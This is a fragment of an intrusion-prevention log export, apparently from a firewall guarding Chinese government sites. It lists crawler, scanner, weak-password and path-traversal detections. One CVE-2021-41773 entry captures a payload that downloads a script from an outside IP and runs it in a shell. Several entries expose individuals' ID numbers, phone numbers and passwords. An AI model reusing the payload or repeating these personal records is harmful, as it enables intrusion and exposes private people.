www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/article_list.htm?itemId=115&parentId=0\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1310722","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58106,\"DestPort\":9000,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:38:55\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"172.169.190.151\",\"User\":\"172.169.190.151\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:9000\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1376258","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":45824,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:38:17\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 13:40:09\\\",\\\"acceptPersonName\\\":\\\"\\\\e5\\\\bc\\\\a0\\\\e7\\\\a7\\\\80\\\\e7\\\\8e\\\\b2\\\",\\\"applyDate\\\":\\\"2025-02-26 13:40:02\\\",\\\"applyIdNo\\\":\\\"14022620001112794X\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"15235239806\\\",\\\"applyName\\\":\\\"\\\\e6\\\\9d\\\\8e\\\\e6\\\\85\\\\a7\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2025-02-26 
16:40:09\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140213MB196264XP400012301400001\\\",\\\"itemName\\\":\\\"\\\\e6\\\\8a\\\\a4\\\\e5\\\\a3\\\\ab\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e9\\\\a6\\\\96\\\\e6\\\\ac\\\\a1\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"840855\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000012\\\",\\\"title\\\":\\\"\\\\e6\\\\8a\\\\a4\\\\e5\\\\a3\\\\ab\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e9\\\\a6\\\\96\\\\e6\\\\ac\\\\a1\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\"},\\\"stepIns\\\":[{\\\"descr\\\":\\\"\\\\e5\\\\90\\\\8c\\\\e6\\\\84\\\\8f\\\",\\\"endDate\\\":\\\"2025-02-26 13:40:16\\\",\\\"limitDays\\\":1,\\\"limitStat\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1441794","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":35918,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:37:01\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 13:39:01\\\",\\\"acceptPersonName\\\":\\\"\\\\e4\\\\b9\\\\94\\\\e6\\\\99\\\\93\\\\e8\\\\8a\\\\b1\\\",\\\"applyDate\\\":\\\"2025-02-26 13:38:54\\\",\\\"applyIdNo\\\":\\\"140202621214309\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13015391758\\\",\\\"applyName\\\":\\\"\\\\e6\\\\a2\\\\81\\\\e5\\\\bb\\\\ba\\\\e5\\\\b9\\\\b3\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2024-04-29 
16:39:01\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140200MB19366520314012300500003\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"306640\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000011\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\"},\\\"\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1507330","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":45680,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:33:25\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 15:35:25\\\",\\\"acceptPersonName\\\":\\\"\\\\e5\\\\bc\\\\a0\\\\e7\\\\a7\\\\80\\\\e7\\\\8e\\\\b2\\\",\\\"applyDate\\\":\\\"2025-02-26 15:35:18\\\",\\\"applyIdNo\\\":\\\"140211198603214428\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13546072988\\\",\\\"applyName\\\":\\\"\\\\e9\\\\9f\\\\a9\\\\e7\\\\8e\\\\89\\\\e5\\\\a8\\\\9f\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2023-09-11 
16:35:25\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140213MB196264XP400012301200003\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"747501\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000009\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\"\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密 码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1572866","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":60256,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:15:34\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.194\",\"User\":\"111.225.148.194\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/view\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1638402","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":57098,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:15:33\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.194\",\"User\":\"111.225.148.194\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/article_list.htm?itemId=139&parentId=0\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1703938","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41308,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":44259,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"CVE-2021-41773_Apache_HTTP_Server路径遍历漏洞\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:14:36\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"43.143.211.222\",\"User\":\"43.143.211.222\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2021-41773\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79:80\",\"HttpFirstLine\":\"\/cgi-bin\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/bin\/sh\",\"Payload\":\"POST \/cgi-bin\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/bin\/sh HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.79:80\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aUpgrade-Insecure-Requests: 1\\\\0d\\\\0aUser-Agent: Custom-AsyncHttpClient\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0aContent-Type: text\/plain\\\\0d\\\\0aContent-Length: 105\\\\0d\\\\0a\\\\0d\\\\0aX=$(curl http:\/\/196.251.88.141\/sh || wget http:\/\/196.251.88.141\/sh -O-); echo \\\"$X\\\" | sh -s apache.selfrep\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"DirectoryTraversal\",\"MethodSubNameCN\":\"目录遍历\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1769474","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":53278,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:14:00\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.7\",\"User\":\"111.225.148.7\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" zyx.datong12380.gov.cn\",\"HttpFirstLine\":\"\/robots.txt\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1835010","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49288,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:12:21\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 14:14:21\\\",\\\"acceptPersonName\\\":\\\"\\\\e4\\\\b9\\\\94\\\\e6\\\\99\\\\93\\\\e8\\\\8a\\\\b1\\\",\\\"applyDate\\\":\\\"2025-02-26 14:14:15\\\",\\\"applyIdNo\\\":\\\"140203610502431\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13935209411\\\",\\\"applyName\\\":\\\"\\\\e6\\\\88\\\\90\\\\e9\\\\92\\\\a6\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2025-02-26 
16:14:21\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140200MB19366520314012300500002\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\8f\\\\98\\\\e6\\\\9b\\\\b4\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"552187\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000008\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\8f\\\\98\\\\e6\\\\9b\\\\b4\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\89\\\"},\\\"stepIns\\\":[{\\\"descr\\\":\\\"\\\\e5\\\\90\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
]
}
}